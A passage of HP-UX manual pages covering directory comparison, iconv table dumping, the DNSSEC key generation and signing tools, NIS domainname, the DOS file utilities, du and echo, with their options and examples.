pear or to mark too much. Manual intervention may be required because the subtleties of various format-
ting macro packages and preprocessors are beyond the scope of diffmk. tbl cannot tolerate .mc com-
mands in its input (see tbl (1)), so any .mc request that would appear inside a .TS range is silently
deleted. The script can be changed if this action is inappropriate, or diffmk can be run on two files that
have both been run through the tbl preprocessor before any comparisons are made.
diffmk uses diff, and thus has the same limitations on file size and performance that diff may
impose (see diff(1)). In particular the performance is nonlinear with the size of the file, and very large
files (well over 1000 lines) may take extremely long to process. Breaking the file into smaller pieces may
be advisable.
diffmk also uses the ed(1) editor. If the file is too large for ed, ed error messages may be embedded in
the file. Again, breaking the file into smaller pieces may be advisable.
SEE ALSO
diff(1), nroff(1).
NAME
dircmp - directory comparison
SYNOPSIS
dircmp [-d] [-s] [-wn ] dir1 dir2
DESCRIPTION
dircmp examines dir1 and dir2 and generates various tabulated information about the contents of the
directories. Sorted listings of files that are unique to each directory are generated for all the options. If
no option is entered, a sorted list is output indicating whether the filenames common to both directories
have the same contents.
-d Compare the contents of files with the same name in both directories and output a list tel-
ling what must be changed in the two files to bring them into agreement. The list format is
described in diff(1).
-s Suppress messages about identical files.
-wn Change the width of the output line to n characters. The default width is 72.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the order in which the output is sorted. If any internationalization variable
contains an invalid setting, dircmp behaves as if all internationalization variables are set to ‘‘C’’ (see
environ (5)).
EXAMPLES
Compare the two directories slate and sleet and produce a list of changes that would make the
directories identical:
dircmp -d slate sleet
WARNINGS
This command is likely to be withdrawn from X/Open standards. Applications using this command might
not be portable to other vendors’ systems. As an alternative, diff -r is recommended.
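A sketch of that alternative on two scratch directories (the directory and file names are invented):

```shell
mkdir -p /tmp/cmp_d1 /tmp/cmp_d2
printf 'same\n'  > /tmp/cmp_d1/common
printf 'same\n'  > /tmp/cmp_d2/common
printf 'extra\n' > /tmp/cmp_d1/only_here
# Recursively compare; files unique to one directory are reported.
diff -r /tmp/cmp_d1 /tmp/cmp_d2 || true
rm -rf /tmp/cmp_d1 /tmp/cmp_d2
```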
SEE ALSO
cmp(1), diff(1).
STANDARDS CONFORMANCE
dircmp: SVID2, SVID3, XPG2, XPG3
NAME
dmpxlt - dump iconv translation tables to a readable format
SYNOPSIS
/usr/bin/dmpxlt [-f output_filename ] [input_filename ]
DESCRIPTION
dmpxlt dumps the compiled version of the iconv codeset conversion tables into an ASCII-readable for-
mat that can be modified and used as input to genxlt (1) to regenerate the table for iconv (1).
Options
dmpxlt recognizes the following options:
-f output_filename Write the output to output_filename. If this option is not selected, the data
will be sent to standard output.
dmpxlt will create an output file in the prescribed format, giving the filecode mapping between the two
code sets, which can be edited and reused by genxlt (1) to create new tables for iconv (1). The entries are
in hexadecimal.
EXTERNAL INFLUENCES
Environment Variables
LANG provides a default value for the internationalization variables that are unset or null. If LANG is
unset or null, the default value of "C" (see lang (5)) is used. If any of the internationalization variables
contains an invalid setting, dmpxlt will behave as if all internationalization variables are set to "C".
See environ (5).
LC_ALL If set to a non-empty string value, overrides the values of all the other internationalization vari-
ables.
LC_MESSAGES determines the locale that should be used to affect the format and contents of diagnostic
messages written to standard error and informative messages written to standard output.
NLSPATH determines the location of message catalogues for the processing of LC_MESSAGES.
RETURN VALUE
The following are exit values:
0 Successful completion.
>0 Error condition occurred.
EXAMPLES
This example creates the source file genxlt_input from the table roma8=iso81:
dmpxlt -f genxlt_input /usr/lib/nls/iconv/tables/roma8=iso81
FILES
/usr/lib/nls/iconv/tables All tables must be installed in this directory.
SEE ALSO
iconv(1), genxlt(1), iconv(3C), environ(5), lang(5).
dnssec-keygen(1) dnssec-keygen(1)
NAME
dnssec-keygen - key generation tool for DNSSEC
SYNOPSIS
dnssec-keygen [-a algorithm ] [-b keysize ] [-e] [-g generator ] [-h] [-n nametype ]
[-p protocol-value] [-r randomdev ] [-s strength-value] [-t type ] [-v level ] name
DESCRIPTION
dnssec-keygen generates keys for Secure DNS (DNSSEC) as defined in RFC2535. It also generates
keys for use in Transaction Signatures (TSIG) which is defined in RFC2845.
Argument
name Specifies the domain name for which the key is to be generated.
Options
-a algorithm This option is used to specify the encryption algorithm. The algorithm can be
RSAMD5, DH, DSA or HMAC-MD5. RSA can also be used, which is equivalent to
RSAMD5.
The algorithm argument identifying the encryption algorithm is case-insensitive.
DNSSEC specifies DSA as a mandatory algorithm and RSA as a recommended one.
Implementations of TSIG must support HMAC-MD5.
-b keysize This option is used to determine the number of bits in the key. The choice of key
size depends on the algorithm that is used.
If RSA algorithm is used, keysize must be between 512 and 2048 bits.
If the DH (Diffie-Hellman) algorithm is used, keysize must be between 128 and 4096
bits.
If the DSA (Digital Signature Algorithm) is used, keysize must be between 512 and
1024 bits and a multiple of 64.
If the HMAC-MD5 algorithm is used, keysize should be between 1 and 512 bits.
-e This option is used for generating RSA keys with a large exponent value.
-g generator This option is used when creating Diffie-Hellman keys. The -g option selects the
Diffie-Hellman generator that is to be used. The only supported values for genera-
tor are 2 and 5. If no Diffie-Hellman generator is supplied, a known prime from
RFC2539 will be used if possible; otherwise, 2 will be used as the generator.
-h A summary of the options and arguments to dnssec-keygen is printed by this
option.
-n nametype This option specifies how the generated key will be used.
nametype can be either ZONE, HOST, ENTITY, or USER to indicate that the key will
be used for signing a zone, host, entity or user, respectively. In this context HOST
and ENTITY are identical. nametype is case-insensitive.
-p protocol-value
This option sets the protocol value for the generated key to protocol-value. The
default is 2 (email) for keys of the type USER and 3 (DNSSEC) for all other key
types. Other possible values for this argument are listed in RFC2535 and its suc-
cessors.
-r randomdev This option overrides the behaviour of dnssec-keygen to use random numbers to
seed the process of generating keys when the system does not have a
/dev/random device to generate random numbers. The dnssec-keygen pro-
gram will prompt for keyboard input and use the time intervals between keystrokes
to provide randomness. With this option it will use randomdev as a source of ran-
dom data.
-s strength-value
This option is used to set the key’s strength value. The generated key will sign DNS
resource records with a strength value of strength-value. It should be a number in
the range 0-15. The default strength is zero. The key strength field currently has
no defined purpose in DNSSEC.
-t type This option indicates if the key is used for authentication or confidentiality. type
can be either AUTHCONF, NOAUTHCONF, NOAUTH or NOCONF. The default is
AUTHCONF. If type is AUTHCONF, the key can be used for authentication and
confidentiality. Setting type to NOAUTHCONF indicates that the key cannot be used
for authentication or confidentiality. A value of NOAUTH means the key can be used
for confidentiality but not for authentication. Similarly, NOCONF defines that the
key cannot be used for confidentiality though it can be used for authentication.
-v level This option can be used to make dnssec-keygen more verbose. As the
debugging/tracing level increases, dnssec-keygen generates increasingly
detailed reports about what it is doing. The default level is zero.
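The algorithm-specific key-size rules given under the -b option can be restated as a small check. The following Python sketch is illustrative only; keysize_valid is a hypothetical helper, not part of dnssec-keygen, and only the numeric ranges come from the text above.

```python
# Illustrative sketch of the dnssec-keygen -b keysize rules described above.
# keysize_valid is hypothetical; only the numeric ranges come from the manual.

def keysize_valid(algorithm: str, keysize: int) -> bool:
    """Return True if keysize is acceptable for the given algorithm."""
    alg = algorithm.upper()              # algorithm names are case-insensitive
    if alg in ("RSA", "RSAMD5"):         # RSA is equivalent to RSAMD5
        return 512 <= keysize <= 2048
    if alg == "DH":                      # Diffie-Hellman
        return 128 <= keysize <= 4096
    if alg == "DSA":                     # must also be a multiple of 64
        return 512 <= keysize <= 1024 and keysize % 64 == 0
    if alg == "HMAC-MD5":
        return 1 <= keysize <= 512
    return False

print(keysize_valid("DSA", 768))   # True: in range and a multiple of 64
print(keysize_valid("DSA", 1000))  # False: not a multiple of 64
```

A 768-bit DSA key, as used in the EXAMPLE below, passes this check; 1000 bits fails because it is not a multiple of 64.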
Generated Keys
When dnssec-keygen completes, it prints a string in the form Knnnn.+aaa+iiiii on the standard out-
put. This is an identification string for the key it has generated. These strings can be supplied as arguments
to the dnssec-makekeyset utility.
The nnnn part is the dot-terminated domain name given by name. The DNSSEC algorithm identifier is
indicated by aaa : 001 for RSA, 002 for Diffie-Hellman, 003 for DSA, or 157 for HMAC-MD5. iiiii is a
five-digit number identifying the key.
dnssec-keygen creates two files. The file names are adapted from the key identification string above.
They have names in the form:
Knnnn.+aaa+iiiii.key and
Knnnn.+aaa+iiiii.private.
These contain the public and private parts of the key respectively. The files generated by dnssec-
keygen follow this naming convention to make it easy for the signing tool dnssec-signzone to iden-
tify which file(s) have to be read to find the necessary key(s) for generating or validating signatures.
The .key file contains a KEY resource record that can be inserted into a zone file with a $INCLUDE
statement. The private part of the key is in the .private file. It contains details of the encryption
algorithm that was used and any relevant parameters: prime number, exponent, modulus, subprime, etc.
For obvious security reasons, this file does not have general read permission. The private part of the key
is used by dnssec-signzone to generate signatures and the public part is used to verify the signa-
tures. Both .key and .private files are generated even for a symmetric encryption algorithm such as
HMAC-MD5, even though the public and private keys are equivalent.
EXAMPLE
To generate a 768-bit DSA key for the domain example.com, the following command would be issued:
dnssec-keygen -a DSA -b 768 -n ZONE example.com
dnssec-keygen would print the key identification string Kexample.com.+003+26160, indicating a
DSA key with identifier 26160. It would also have created the files
Kexample.com.+003+26160.key and
Kexample.com.+003+26160.private
containing the public and private keys respectively for the generated DSA key.
FILES
/dev/random
SEE ALSO
dnssec-makekeyset(1), dnssec-signkey(1), dnssec-signzone(1), RFC2535, RFC2845, RFC2539.
BUGS
The naming convention for the public and private key files is a little clumsy. It won’t work for domain
names that are longer than 236 characters because the .+aaa+iiiii .private suffix results in filenames
that are too long for most UNIX systems.
dnssec-makekeyset(1) dnssec-makekeyset(1)
NAME
dnssec-makekeyset - used to produce a set of DNSSEC keys
SYNOPSIS
dnssec-makekeyset [-a] [-h] [-s start-time ] [-e end-time ] [-t TTL] [-r randomdev ]
[-p] [-v level ] keyfile ...
DESCRIPTION
dnssec-makekeyset generates a key set from one or more keys created by dnssec-keygen. It
creates a file containing KEY and SIG records for some zone which can then be signed by the zone’s
parent if the parent zone is DNSSEC-aware.
keyfile should be a key identification string as reported by dnssec-keygen; such as, Knnnn.+aaa+iiiii,
where nnnn is the name of the key, aaa is the encryption algorithm and iiiii is the key identifier. Multi-
ple keyfile arguments can be supplied when there are several keys to be combined by dnssec-
makekeyset into a key set.
Options
-a This option is used to verify all generated signatures.
-e end-time The expiration date for the SIG records can be set by the -e option. Note that in
this context, the expiration date specifies when the SIG records are no longer valid,
not when they are deleted from caches on name servers.
When no expiration date is set for the SIG records, dnssec-makekeyset
defaults to an expire time of 30 days from the start time of the SIG records.
-h This option is used to display a short summary of the options provided with
dnssec-makekeyset.
-p This option is used to instruct dnssec-makekeyset to use pseudo-random data
when self-signing the keyset. This is faster, but less secure, than using genuinely
random data for signing. This option may be useful when the entropy source is lim-
ited.
-r randomdev An alternate source of random data can be specified with the -r option. randomdev
is the name of the file to use to obtain random data. By default, /dev/random is
used if this device is available. If this file is not provided by the operating system
and no -r option is used, dnssec-makekeyset will prompt the user for input
from the keyboard and use the time between keystrokes to derive some random
data.
-s start-time For any SIG records that are in the key set, the start time when the SIG records
become valid is specified with the -s option. If no -s option is supplied, the current
date and time is used for the start time of the SIG records.
-t TTL The -t option is followed by a time-to-live argument TTL which indicates the TTL
value that will be assigned to the assembled KEY and SIG records in the output file.
TTL is expressed in seconds. If no -t option is provided, dnssec-makekeyset
prints a warning and uses a default TTL of 3600 seconds.
-v level This option can be used to make dnssec-makekeyset more verbose. As the
debugging/tracing level level increases, dnssec-makekeyset generates increas-
ingly detailed reports about what it is doing. The default level is zero.
If dnssec-makekeyset is successful, it creates a file name of the form nnnn.keyset. This file
contains the KEY and SIG records for domain nnnn, the domain name part from the key file
identifier produced when dnssec-keygen created the domain’s public and private keys. The
.keyset file can then be transferred to the DNS administrator of the parent zone for them to sign
the contents with dnssec-signkey.
EXAMPLE
The following command generates a key set for the DSA key for example.com that was shown in the
dnssec-keygen man page. (Note the backslash is simply a line continuation character and not part of
the dnssec-makekeyset command syntax.)
dnssec-makekeyset -t 86400 -s 20000701120000 -e +2592000 \
Kexample.com.+003+26160
dnssec-makekeyset will create a file called example.com.keyset containing a SIG and KEY
record for example.com. These records will have a TTL of 86400 seconds (1 day). The SIG record
becomes valid at noon UTC on July 1st 2000 and expires 30 days (2592000 seconds) later.
The DNS administrator for example.com could then send example.com.keyset to the DNS
administrator for .com so that they could sign the resource records in the file. This assumes that the
.com zone is DNSSEC-aware and the administrators of the two zones have some mechanism for authen-
ticating each other and exchanging the keys and signatures securely.
FILES
/dev/random
SEE ALSO
dnssec-keygen(1), dnssec-signkey(1), dnssec-signzone(1), RFC2535.
dnssec-signkey(1) dnssec-signkey(1)
NAME
dnssec-signkey - DNSSEC keyset signing tool
SYNOPSIS
dnssec-signkey [-a] [-c class ] [-e end-time ] [-h] [-p] [-r randomdev ] [-s start-time ]
[-v level ] keyset keyfile ...
DESCRIPTION
dnssec-signkey is used to sign a key set for a child zone. Typically this would be provided by a
.keyset file generated by the dnssec-makekeyset utility. This provides a mechanism for a
DNSSEC-aware zone to sign the keys of any DNSSEC-aware child zones. The child zone’s key set gets
signed with the zone keys for its parent zone.
keyset will be the pathname of the child zone’s .keyset file.
Each keyfile argument will be a key identification string as reported by dnssec-keygen for the parent
zone. This allows the child’s keys to be signed by more than one parent zone key.
Options
-a This option verifies all generated signatures.
-c class This option specifies the DNS class of the key sets. Currently only IN class is sup-
ported.
-e end-time This option specifies the date and time when the generated SIG records expire. If no
end-time is specified, 30 days from the start time is used as a default.
-h This option makes dnssec-signkey print a summary of its command line
options and arguments.
-r randomdev This option overrides the behavior of dnssec-signkey to use random numbers to
seed the process of generating keys when the system does not have a
/dev/random device to generate random numbers. The dnssec-signkey pro-
gram will prompt for keyboard input and use the time intervals between keystrokes
to provide randomness. With this option, it will use randomdev as a source of ran-
dom data.
-s start-time This option specifies the date and time when the generated SIG records become
valid. If no start-time is specified, the current time is used.
-v level This option can be used to make dnssec-signkey more verbose. As the
debugging/tracing level increases, dnssec-signkey generates increasingly
detailed reports about what it is doing. The default level is zero.
When dnssec-signkey completes successfully, it generates a file called nnnn.signedkey containing
the signed keys for child zone nnnn. The keys from the keyset file would have been signed by the
parent zone’s key or keys which were supplied as keyfile arguments. This file should be sent to the
DNS administrator of the child zone. They arrange for its contents to be incorporated into the zone file
when it next gets signed with dnssec-signzone. A copy of the generated signedkey file should be
kept by the parent zone’s DNS administrator, since it will be needed when signing the parent zone.
EXAMPLE
The DNS administrator for a DNSSEC-aware .com zone would use the following command to make
dnssec-signkey sign the .keyset file for example.com created in the example shown in the man
page for dnssec-makekeyset:
dnssec-signkey example.com.keyset Kcom.+003+51944
where Kcom.+003+51944 was a key file identifier that was produced when dnssec-keygen gen-
erated a key for the .com zone.
dnssec-signkey will produce a file called example.com.signedkey which has the keys for
example.com signed by the com zone’s zone key.
FILES
/dev/random
SEE ALSO
dnssec-keygen(1), dnssec-makekeyset(1), dnssec-signzone(1), RFC2535.
dnssec-signzone(1) dnssec-signzone(1)
NAME
dnssec-signzone - DNSSEC zone signing tool
SYNOPSIS
dnssec-signzone [-a] [-c cycle-time ] [-d directory ] [-e end-time ] [-f output-file ] [-h]
[-i interval ] [-n ncpus ] [-o origin ] [-p] [-r randomdev ] [-s start-time ] [-t]
[-v level ] zonefile keyfile ....
DESCRIPTION
dnssec-signzone is used to sign a zone. Any .signedkey files for the zone to be signed should be
present in the current directory, along with the keys that will be used to sign the zone.
Arguments
zonefile This is the name of the unsigned zone file.
keyfile If no keyfile arguments are supplied, the default behaviour is to use all of the zone’s keys
that are present in the current directory. Providing specific keyfile arguments constrains
dnssec-signzone to only use those keys for signing the zone. Each keyfile argument
would be an identification string for a key created with dnssec-keygen.
If the zone to be signed has any secure subzones, the .signedkey files for those subzones need to be
available in the current working directory used by dnssec-signzone.
Options
-a This option is used to force verification of the signatures generated by dnssec-
signzone. By default the signature files are not verified.
-c cycle-time
This option is used to configure the cycle period which is used for resigning records when
a previously signed zone is passed as input to dnssec-signzone. The cycle period is
an offset from the current time (in seconds). If a SIG record expires after the cycle
period, it is retained. Otherwise, it is considered to be expiring soon, and dnssec-
signzone will remove it and generate a new SIG record to replace it.
-d directory
This option is used to look for signedkey files in the specified directory.
-e end-time
This option is used to set the expiration time for the SIG records. The expiration time
specifies when the SIG records are no longer valid, not when they are deleted from caches
on name servers. end-time can represent an absolute or relative date.
The YYYYMMDDHHMMSS notation is used to indicate an absolute date and time.
When end-time is +N, it indicates that the SIG records will expire in N seconds after
their start time.
-f output-file
This option is used to override the use of the default signed zone file,
zonefile.signed by dnssec-signzone.
-h This option is used to print a short summary of the options and arguments to dnssec-
signzone.
-i interval
When a previously signed zone is passed as input, records may be resigned. The interval
option specifies the cycle interval as an offset from the current time (in seconds). If a SIG
record expires after the cycle interval, it is retained. Otherwise, it is considered to be
expiring soon, and it will be replaced.
The default cycle interval is one quarter of the difference between the signature end and
start times. So if neither end-time nor start-time is specified, dnssec-signzone gen-
erates signatures that are valid for 30 days, with a cycle interval of 7.5 days. Therefore,
if any existing SIG records are due to expire in less than 7.5 days, they would be
replaced.
-n ncpus This option can be used to create worker threads equal to ncpus to take advantage of
multiple CPUs. If no option is given, named will try to determine the number of CPUs
present and create one thread per CPU.
-o origin This option specifies the zone origin. If not specified, the name of the zone file is assumed
to be the origin.
-r randomdev
This option overrides the behaviour of dnssec-signzone to use random numbers to
seed the process of signing the zone. If the system does not have a /dev/random device
to generate random numbers, the dnssec-signzone program will prompt for keyboard
input and use the time intervals between keystrokes to provide randomness. With this
option, it will use randomdev as a source of random data.
EXAMPLE
The example below shows how dnssec-signzone could be used to sign the example.com zone with
the key that was generated in the example given in the man page for dnssec-keygen. The zone file for
this zone is example.com, which is the same as the origin, so there is no need to use the -o option to
set the origin. This zone file contains the key set for example.com that was created by dnssec-
makekeyset. The zone’s keys are either appended to the zone file or incorporated using a $INCLUDE
statement. If there was a .signedkey file from the parent zone; i.e., example.com.signedkey, it
should be present in the current directory. This allows the parent zone’s signature to be included in the
signed version of the example.com zone.
dnssec-signzone example.com Kexample.com.+003+26160
dnssec-signzone will create a file called example.com.signed, the signed version of the
example.com zone. This file can then be referenced in a zone{} statement in /etc/named.conf so
that it can be loaded by the name server.
FILES
/dev/random
SEE ALSO
dnssec-keygen(1), dnssec-makekeyset(1), dnssec-signkey(1), RFC2535.
domainname(1) domainname(1)
NAME
domainname - set or display name of Network Information Service domain
SYNOPSIS
domainname [ name_of_domain ]
DESCRIPTION
Network Information Service (NIS) uses domain names to refer collectively to a group of hosts. Without
an argument, domainname displays the name of the NIS domain. Only superuser can set the domain
name by providing name_of_domain. The domain name is usually set in the configuration file
/etc/rc.config.d/namesvrs, by setting the NIS_DOMAIN variable.
DEPENDENCIES
NIS servers use the NIS domain name as the name of a subdirectory of /var/yp. For this,
name_of_domain should not be a . or .. and it should not contain /. Since the NIS domain name can
be as long as 64 characters, name_of_domain may exceed the maximum file name length allowed on a
given file system. If that length is exceeded, the subdirectory name becomes a truncated version of the
NIS domain name.
The first 14 characters of all NIS domains on the network must be unique: truncated names should be
checked to verify that they meet this requirement.
AUTHOR
domainname was developed by Sun Microsystems, Inc.
SEE ALSO
ypinit(1M), getdomainname(2), setdomainname(2).
dos2ux(1) dos2ux(1)
NAME
dos2ux, ux2dos - convert ASCII file format
SYNOPSIS
dos2ux file ...
ux2dos file ...
DESCRIPTION
dos2ux and ux2dos read each specified file in sequence and write it to standard output, converting to
HP-UX format or to DOS format, respectively. Each file can be either DOS format or HP-UX format for
either command.
A DOS file name is recognized by the presence of an embedded colon (:) delimiter; see dosif (4) for DOS
file naming conventions.
If no input file is given or if the argument - is encountered, dos2ux and ux2dos read from standard
input. Standard input can be combined with other files.
EXAMPLES
Print file myfile on the display:
dos2ux myfile
Convert file1 and file2 to DOS format then concatenate them together, placing them in file3.
ux2dos file1 file2 > file3
RETURN VALUE
dos2ux and ux2dos return 0 if successful or 2 if the command failed. The only possible failure is the
inability to open a specified file, in which case the commands print a warning.
WARNINGS
Command formats resembling:
dos2ux file1 file2 > file1
overwrite the data in file1 before the concatenation begins, causing a loss of the contents of file1.
Therefore, be careful when using shell special characters.
SEE ALSO
doschmod(1), doscp(1), dosdf(1), dosls(1), dosmkdir(1), dosrm(1), dosif(4).
doschmod(1) doschmod(1)
(TO BE OBSOLETED)
NAME
doschmod - change attributes of a DOS file
SYNOPSIS
doschmod [-mu] mode device : file ...
DESCRIPTION
The doschmod command is targeted for removal from HP-UX; see the WARNINGS below.
doschmod is the DOS counterpart of chmod (see chmod(1)).
Options
doschmod recognizes the following options:
-m If an ordinary file with the same name as volume label exists, operation will be performed on
the file instead of the volume label.
-u Disable argument case conversion. In the absence of this option, all DOS file names are con-
verted to upper case.
The attributes of each named file are changed according to mode, which is an octal number in the range
000 to 0377. mode is constructed from the logical OR of the following modes:
200 Reserved. Do not use.
100 Reserved. Do not use.
040 Archive. Set whenever the file has been written to and closed.
020 Directory. Do not modify.
010 Volume Label. Do not modify.
004 System file. Marks files that are part of the DOS operating system.
002 Hidden file. Marks files that do not appear in a DOS directory listing using the DOS DIR
command.
001 Read-Only file. Marks files as read-only.
WARNINGS
Use of doschmod is discouraged because it is targeted for removal from HP-UX.
Specifying inappropriate mode values can make files and/or directories inaccessible, and in certain cases
can damage the file system. To prevent such problems, do not change the mode of directories and volume
labels.
Normal users should have no need to use mode bits other than 001, 002, and 040.
EXAMPLES
Mark file /dev/rfd9122:memo.txt as a hidden file:
doschmod 002 /dev/rfd9122:memo.txt
Mark file driveC:autoexec.bat read-only:
doschmod 001 driveC:autoexec.bat
SEE ALSO
chmod(1), dos2ux(1), doscp(1), dosdf(1), dosls(1), dosmkdir(1), dosrm(1), chmod(2), dosif(4).
doscp(1) doscp(1)
(TO BE OBSOLETED)
NAME
doscp - copy to or from DOS files
SYNOPSIS
doscp [-fmvu] file1 file2
doscp [-fmvu] file1 [ file2 ... ] directory
DESCRIPTION
The doscp command is targeted for removal from HP-UX; see the WARNINGS below.
doscp is the DOS counterpart of cp (see cp (1)). doscp copies a DOS file to a DOS or HP-UX file, an
HP-UX file to an HP-UX or DOS file, or HP-UX or DOS files to an HP-UX or DOS directory. The last name in
the argument list is the destination file or directory.
A DOS file name is recognized by the presence of an embedded colon (:) delimiter; see dosif (4) for DOS
A dA file naming conventions.
Metacharacters *, ?, and [ ... ] can be used when specifying both HP-UX and DOS file names. These
must be quoted when specifying a DOS file name, because file name expansion must be performed by the
DOS utilities, not by the shell. DOS utilities expand file names as described in regexp (5) under PATTERN
MATCHING NOTATION.
The file name - (dash) is interpreted to mean standard input or standard output depending upon its
position in the argument list.
Options
doscp recognizes the following options:
-f Unconditionally write over an existing file. In the absence of this option, doscp asks per-
mission to overwrite an existing HP-UX file.
-v Verbose mode. doscp prints the source name.
-u Disable argument case conversion. In the absence of this option, all DOS file names are con-
verted to upper case.
-m If an ordinary file with the same name as volume label exists, operation will be performed on
the file instead of the volume label.
RETURN VALUE
doscp returns 0 if all files are copied successfully. Otherwise, it prints a message to standard error and
returns with a non-zero value.
EXAMPLES
Copy the files in the HP-UX directory abc to the DOS volume stored as HP-UX file hard_disk:
doscp abc/* hard_disk:
Copy DOS file /backup/log through the HP-UX special file /dev/rfd9127 to HP-UX file logcopy
located in the current directory:
doscp /dev/rfd9127:/backup/log logcopy
Copy DOS file zulu on the volume stored as HP-UX file bb to standard output:
doscp bb:zulu -
Copy all files in directory /dameron with extension txt in the DOS volume /dev/rdsk/c1t2d0 to
the HP-UX directory abacus located in the current directory:
doscp ’/dev/rdsk/c1t2d0:/dameron/*.txt’ abacus
WARNINGS
Use of doscp is discouraged because it is targeted for removal from HP-UX. Use dos2ux (1) instead.
doscp works more reliably if you use a raw device special file (/dev/rdsk/) than a block device special
file.
To use SCSI floppy disk devices, the sflop device driver must be configured into the kernel. (You can
use the ioscan command to verify the configuration.)
SEE ALSO
cp(1), dos2ux(1), doschmod(1), dosdf(1), dosls(1), dosmkdir(1), dosrm(1), ioscan(1M), dosif(4).
dosdf(1) dosdf(1)
(TO BE OBSOLETED)
NAME
dosdf - report number of free disk clusters
SYNOPSIS
dosdf device[:]
DESCRIPTION
The dosdf command is targeted for removal from HP-UX; see the WARNINGS below.
dosdf is the DOS counterpart of the df command (see df(1)). It prints the cluster size in bytes and the
number of free clusters on the specified DOS volume.
WARNINGS
Use of dosdf is discouraged because it is targeted for removal from HP-UX.
SEE ALSO
df(1), dos2ux(1), doschmod(1), doscp(1), dosls(1), dosmkdir(1), dosrm(1), dosif(4).
dosls(1) dosls(1)
(TO BE OBSOLETED)
NAME
dosls, dosll - list contents of DOS directories
SYNOPSIS
dosls [-aAmudl] device :[ file ] ...
dosll [-aAmudl] device :[ file ] ...
DESCRIPTION
The dosls and dosll commands are targeted for removal from HP-UX; see the WARNINGS below.
dosls and dosll are the DOS counterparts of ls and ll (see ls(1)): they list the contents of DOS
directories.
WARNINGS
Use of dosls and dosll is discouraged because they are targeted for removal from HP-UX.
SEE ALSO
dos2ux(1), doschmod(1), doscp(1), dosdf(1), dosmkdir(1), dosrm(1), ls(1), dosif(4).
dosmkdir(1) dosmkdir(1)
(TO BE OBSOLETED)
NAME
dosmkdir - make a DOS directory
SYNOPSIS
dosmkdir [-mu] device :directory ...
DESCRIPTION
The dosmkdir command is targeted for removal from HP-UX; see the WARNINGS below.
dosmkdir is the DOS counterpart of the mkdir command (see mkdir (1)). It creates specified direc-
tories. The standard entries, . for the directory itself and .. for its parent, are made automatically.
Options
-m If an ordinary file with the same name as volume label exists, operation will be performed on
the file instead of the volume label.
-u Disable argument case conversion. In the absence of this option, all DOS file names are con-
verted to upper case.
DIAGNOSTICS
dosmkdir returns 0 if all directories were successfully created. Otherwise, it prints a message to stan-
dard error and returns non-zero.
WARNINGS
Use of dosmkdir is discouraged because it is targeted for removal from HP-UX.
EXAMPLES
Create an empty subdirectory named numbers under the directory /math/lib on the device accessed
through HP-UX special file /dev/rfd9122:
dosmkdir /dev/rfd9122:/math/lib/numbers
SEE ALSO
dos2ux(1), doschmod(1), doscp(1), dosdf(1), dosls(1), dosrm(1), mkdir(1), dosif(4).
dosrm(1) dosrm(1)
(TO BE OBSOLETED)
NAME
dosrm, dosrmdir - remove DOS files or directories
SYNOPSIS
dosrm [-fmriu] device :file ...
dosrmdir [-mu] device :file ...
DESCRIPTION
The dosrm and dosrmdir commands are targeted for removal from HP-UX; see the WARNINGS
below.
dosrm and dosrmdir are DOS counterparts of rm and rmdir (see rm(1) and rmdir (1), respectively).
dosrm removes the entries for one or more files from a directory. If a specified file is a directory, an
error message is printed unless the optional argument -r is specified (see below).
dosrmdir removes entries for the named directories, provided they are empty.
Options
dosrm and dosrmdir recognize the following options:
-f (force) Unconditionally remove the specified file, even if the file is marked read-only.
-r Cause dosrm to recursively delete the entire contents of a directory, followed by the direc-
tory itself. dosrm can recursively delete up to 17 levels of directories.
-i (interactive) Cause dosrm to ask whether or not to delete each file. If -r is also specified,
dosrm asks whether to examine each directory encountered.
-m If an ordinary file with the same name as volume label exists, operation will be performed on
the file instead of volume label.
-u Disable argument case conversion. In the absence of this option, all DOS file names are con-
verted to upper case.
WARNINGS
Use of dosrm and dosrmdir is discouraged because they are targeted for removal from HP-UX.
EXAMPLES
These examples assume that a DOS directory structure exists on the device accessed through the HP-UX
special file /dev/rfd9122.
Recursively comb through the DOS directory /tmp and ask if each DOS file should be removed forcibly
(that is, with no file mode checks):
dosrm -irf /dev/rfd9122:/tmp
Remove the DOS directory doug from the DOS volume stored as HP-UX file hard_disk:
dosrmdir hard_disk:doug
SEE ALSO
dos2ux(1), doschmod(1), doscp(1), dosdf(1), dosls(1), dosmkdir(1), rm(1), rmdir(1), dosif(4).
du(1) du(1)
NAME
du - summarize disk usage
SYNOPSIS
du [-a|-s] [-bkrx] [-t type ] [ name ... ]
DESCRIPTION
The du command gives the number of 512-byte blocks allocated for all files and (recursively) directories
within each directory and file specified by the name operands. The block count includes the indirect
blocks of the file. A file with two or more links is counted only once. If name is missing, the current
working directory is used.
By default, du generates an entry only for the name operands and each directory contained within those
hierarchies.
Options
The du command recognizes the following options:
-a Print entries for each file encountered in the directory hierarchies in addition to the
normal output.
-b For each name operand that is a directory for which file system swap has been
enabled, print the number of blocks the swap system is currently using.
-k Gives the block count in 1024-byte blocks.
-r Print messages about directories that cannot be read, files that cannot be accessed,
etc. du is normally silent about such conditions.
-s Print only the grand total of disk usage for each of the specified name operands.
-x Restrict reporting to only those files that have the same device as the file specified
by the name operand. Disk usage is normally reported for the entire directory
hierarchy below each of the given name operands.
-t type Restrict reporting to file systems of the specified type . (Example values for type are
hfs, cdfs, nfs, etc.) Multiple -t type options can be specified. Disk usage is
normally reported for the entire directory hierarchy below each of the given name
operands.
EXAMPLES
Display disk usage for the current working directory and all directories below it, generating error mes-
sages for unreadable directories:
du -r
Display disk usage for the entire file system except for any cdfs or nfs mounted file systems:
du -t hfs /
Display disk usage for files on the root volume (/) only. No usage statistics are collected for any other
mounted file systems:
du -x /
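The -s and -k options above are commonly combined to get a single 1024-byte-block total per operand; the proj directory here is hypothetical:

```shell
# Summarize one hierarchy in kilobyte blocks: output is a single
# line of the form "<total-KB><tab>proj".
mkdir -p proj/src
echo "int main(void) { return 0; }" > proj/src/main.c
du -sk proj
rm -r proj
```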
WARNINGS
Block counts are incorrect for files that contain holes.
SEE ALSO
df(1M), bdf(1M), quot(1M).
STANDARDS CONFORMANCE
du: SVID2, SVID3, XPG2, XPG3, XPG4
echo(1) echo(1)
NAME
echo - echo (print) arguments
SYNOPSIS
echo [ arg ] ...
DESCRIPTION
echo writes its arguments separated by blanks and terminated by a new-line on the standard output. It
also understands C-like escape conventions; beware of conflicts with the shell’s use of \:
\a write an alert character
\b backspace
\c print line without appending a new-line
\f form-feed
\n new-line
\r carriage return
\t tab
\v vertical tab
\\ backslash
\n the 8-bit character whose ASCII code is the 1-, 2-, 3- or 4-digit octal number n, whose first
character must be a zero.
